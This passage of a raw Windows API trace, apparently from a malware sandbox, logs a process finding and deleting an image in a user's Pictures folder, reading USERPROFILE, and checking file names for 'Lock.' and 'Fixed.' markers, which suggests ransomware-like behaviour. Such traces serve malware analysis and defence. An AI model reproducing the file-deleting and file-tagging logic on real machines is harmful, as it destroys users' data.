lpFileName="C:\\Users\\FD1HVy\\Pictures/H4_H0S0fmbzOF.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\H4_H0S0fmbzOF.png", lpFilePart=0x8cedf4*="H4_H0S0fmbzOF.png") returned 0x2a [0210.348] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\H4_H0S0fmbzOF.png" (normalized: "c:\\users\\fd1hvy\\pictures\\h4_h0s0fmbzof.png")) returned 0x20 [0210.348] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\H4_H0S0fmbzOF.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31506860, ftCreationTime.dwHighDateTime=0x1d5d2e3, ftLastAccessTime.dwLowDateTime=0x21fb5f0, ftLastAccessTime.dwHighDateTime=0x1d5d7b6, ftLastWriteTime.dwLowDateTime=0x21fb5f0, ftLastWriteTime.dwHighDateTime=0x1d5d7b6, nFileSizeHigh=0x0, nFileSizeLow=0x15e09, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="H4_H0S0fmbzOF.png", cAlternateFileName="H4_H0S~1.PNG")) returned 0x9e1eb8 [0210.348] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\H4_H0S0fmbzOF.png" (normalized: "c:\\users\\fd1hvy\\pictures\\h4_h0s0fmbzof.png")) returned 1 [0210.351] FindNextFileW (in: hFindFile=0x9e1eb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31506860, ftCreationTime.dwHighDateTime=0x1d5d2e3, ftLastAccessTime.dwLowDateTime=0x21fb5f0, ftLastAccessTime.dwHighDateTime=0x1d5d7b6, ftLastWriteTime.dwLowDateTime=0x21fb5f0, ftLastWriteTime.dwHighDateTime=0x1d5d7b6, nFileSizeHigh=0x0, nFileSizeLow=0x15e09, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="H4_H0S0fmbzOF.png", cAlternateFileName="H4_H0S~1.PNG")) returned 0 [0210.351] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0210.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3f58 | out: hHeap=0x2af0000) returned 1 [0210.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.351] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.351] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0210.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0210.352] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.352] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0210.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0210.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0210.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0210.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0210.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0210.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0210.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0210.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5f6c0 [0210.353] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/H4_H0S0fmbzOF.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\H4_H0S0fmbzOF.png", lpFilePart=0x8cf650*="H4_H0S0fmbzOF.png") returned 0x2a [0210.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0210.353] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\H4_H0S0fmbzOF.png" (normalized: "c:\\users\\fd1hvy\\pictures\\h4_h0s0fmbzof.png")) returned 0xffffffff [0210.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0210.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.354] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0210.354] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.354] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0210.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0210.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0210.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0210.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hv6N_Hm7BbFlazd6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v6N_Hm7BbFlazd6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6N_Hm7BbFlazd6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N_Hm7BbFlazd6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Hm7BbFlazd6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hm7BbFlazd6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m7BbFlazd6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7BbFlazd6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BbFlazd6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bFlazd6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Flazd6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lazd6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="azd6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zd6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0210.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0210.355] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0210.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0210.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2c) returned 0x2aa6300 [0210.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hv6N_Hm7BbFlazd6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v6N_Hm7BbFlazd6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6N_Hm7BbFlazd6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N_Hm7BbFlazd6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Hm7BbFlazd6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hm7BbFlazd6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m7BbFlazd6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7BbFlazd6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BbFlazd6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bFlazd6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Flazd6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lazd6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="azd6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zd6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6N.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6530 [0210.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6530 | out: hHeap=0x2af0000) returned 1 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a00 | out: hHeap=0x2af0000) returned 1 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0210.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.357] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0210.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0210.357] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0210.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0210.358] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.358] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0210.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0210.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: 